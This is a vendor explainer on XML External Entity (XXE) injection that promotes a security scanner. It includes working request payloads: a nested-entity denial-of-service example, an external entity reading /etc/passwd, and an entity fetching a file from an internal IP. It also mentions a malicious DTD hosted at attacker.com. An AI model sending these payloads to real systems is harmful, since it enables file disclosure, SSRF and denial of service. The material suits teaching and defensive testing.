What is an XML External Entity (XXE) Injection? | NeuraLegion

XML external entity injection, also known as XXE attacks, is one of the most common security vulnerabilities in web applications, APIs, and microservices. It allows hackers to interfere with an application’s processing of XML data. Although the XXE is not as popular as XSS attacks or SQL Injection it is one of the OWASP Top 10 security risks.

By performing an XXE Injection, attackers can view files on the application server file system, or interact with any backend external systems that the application itself can access.

In some cases, hackers can even cause Denial of Service (DoS) and elevate an XXE attack to compromise the underlying server or other backend infrastructure, by leveraging the XXE vulnerability to perform server-side request forgery (SSRF) attack. Below are examples that explain this in more detail.

Extensible Markup Language (XML) is a simple, very flexible data format. It is utilized everywhere from web services (SOAP, REST, XML-RPC) through documents (HTML, XML, DOCX) to image files (SVG, EXIF data). To interpret XML data, an application requires an XML parser (XML processor).

Here is an example output of a simple web application that accepts XML input, parses it and outputs the result:

REQUEST:

POST http://example.com/xxe HTTP/1.1
<test>
Hello Neuralegion
</test>

RESPONSE:

HTTP/1.0 200 OK
Hello Neuralegion

XML is used for much more than declaring elements, attributes, and text. XML documents need to be of a specific type which is declared in the document by specifying the type definition. The parser validates if the XML document is compatible with that specific type of definition before the document is processed.

Two types of definitions can be used:

  1. 1. An XML Schema Definition (XSD)
  2. 2. Document Type Definition (DTD)

XXE vulnerabilities usually occur in Document Type Definitions that may be considered legacy but are still commonly used. They are obtained from SGML (the ancestor of XML).

Below is an example of an XXE payload, which is a DTD named test with an element called security. This element is now an alias for the word “NeuraLegion”. Accordingly, whenever &security; is used, the XML parser replaces that entity with the word “NeuraLegion”.

REQUEST:

POST http://example.com/xxe HTTP/1.1
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE test [
<!ELEMENT test ANY>
<!ENTITY security "Neuralegion">
]>
<test>
Hello &security;
</test>

RESPONSE:

HTTP/1.0 200 OK
Hello Neuralegion

By embedding XML entities within entities hackers can cause DoS. This attack is usually referred to as the Billion Laughs attack

The result is an overload of the memory of the XML parser. Although, some XML parsers automatically limit the amount of memory they use.

REQUEST:

POST http://example.com/xxe HTTP/1.1
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE test [
<!ELEMENT test ANY>
<!ENTITY security "Neuralegion">
<!ENTITY temp_1 "&security;&security;">
<!ENTITY temp_2 "&temp_1;&temp_1;&temp_1;&temp_1;">
<!ENTITY temp3 "&temp_2;&temp_2;&temp_2;&temp_2;&temp_2;">
]>
<test>
Hello &temp_3;
</test>

RESPONSE:

HTTP/1.0 200 OK
Hello Neuralegion
NeuralegionNeuralegionNeuralegionNeuralegionNeuralegionNeuralegionNeuralegionNeuralegionNeuralegionNeuralegionNeuralegionNeuralegionNeuralegionNeuralegionNeuralegionNeuralegionNeuralegionNeuralegionNeuralegionNeuralegionNeuralegionNeuralegionNeuralegionNeuralegionNeuralegionNeuralegionNeuralegionNeuralegionNeuralegionNeuralegionNeuralegionNeuralegionNeuralegionNeuralegionNeuralegionNeuralegionNeuralegionNeuralegionNeuralegionNeuralegion

Hackers can use XML entities for much more than just reducing the availability of an application. This is due to the fact that XML entities don’t have to be defined in the XML document. In fact, XML entities can come from any source – including external sources (therefore the name XML External Entity). This is when XXE becomes a type of a Server Side Request Forgery (SSRF) attack.

An attacker can create a request, like the one in the example by using a URI (In XML this is known as the system identifier). If the XML parser is properly configured to process external entities (by default popular XML parsers are configured to do so), the webserver will return the contents of a file system, potentially containing sensitive data.

REQUEST:

POST http://example.com/xxe HTTP/1.1
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE test [
<!ELEMENT test ANY>
<!ENTITY xxe SYSTEM
"file:///etc/passwd">
]>
<test>
&xxe;
</test>

RESPONSE:

HTTP/1.0 200 OK
root:x:0:0:root:/root:/bin/sh
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
...

Hackers are not only limited to system files, but they can also steal other local files including source code if they understand the location and structure of the web application. With some XML parsers, it is conceivable to list directories in addition to the contents of local resources. It is pretty common for XXE attacks to enable hackers to make regular HTTP requests to files on the local network (only from behind firewalls)

REQUEST:

POST http://example.com/xxe HTTP/1.1
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE test [
<!ELEMENT test ANY>
<!ENTITY payload SYSTEM
"http://127.16.0.1/flag.txt">
]>
<test>
&payload;
</test>

RESPONSE:

HTTP/1.0 200 OK
Hello security researchers, I'm a flag on the server on the local network


Parameter Entities

Besides general entities, XML also supports parameter entities that are only used in the DTDs. When a parameter entity starts with a “%” character it instructs the XML parser that a parameter entity is defined. 

In the example below, a parameter entity is used to define a general entity, which is ultimately called from the XML document. With this consideration, a hacker can practice the theoretical CDATA example and transform it into a working attack by creating a malicious DTD hosted on attacker.com/evil.dtd.

REQUEST:

POST http://example.com/xxe HTTP/1.1
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE test [
<!ENTITY % param_entity
"<!ENTITY gen_entity 'NeuraLegion'>">
%param_entity;
]>
<test>
&gen_entity;
</test>

RESPONSE:

HTTP/1.0 200 OK
NeuraLegion


How Can XXE Vulnerabilities Be Detected?

For the first time, XXE vulnerabilities have been emphasized in the OWASP Top Ten 2017 Project in fourth place on the list. Consequences are serious and should be treated and remediated as the highest security risks. 

Luckily, testing your web application for XXE attacks as well as the other vulnerabilities is easy by using NeuraLegion’s NexDAST solution, which incorporates a specialized XXE scanner module. Contact us to learn more about running XXE scans on your web application, and please ask any questions that you have regarding our solutions.